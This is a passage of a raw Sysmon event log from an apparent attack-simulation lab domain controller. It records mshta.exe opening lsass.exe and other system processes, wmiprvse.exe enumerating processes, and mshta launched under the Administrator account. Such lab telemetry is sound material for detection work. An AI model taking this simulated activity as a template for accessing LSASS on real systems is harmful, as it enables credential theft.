16:01:39.518{7901BC46-4985-6008-0B00-00000000A301}856596C:\Windows\system32\lsass.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.518{7901BC46-4985-6008-0B00-00000000A301}856596C:\Windows\system32\lsass.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.503{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.487{7901BC46-4987-6008-1600-00000000A301}15362440C:\Windows\system32\svchost.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.487{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.253{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029181Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029180Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029179Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029178Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.250{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEC:\Windows\System32\mshta.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000029175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.237{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:39.221{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029164Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 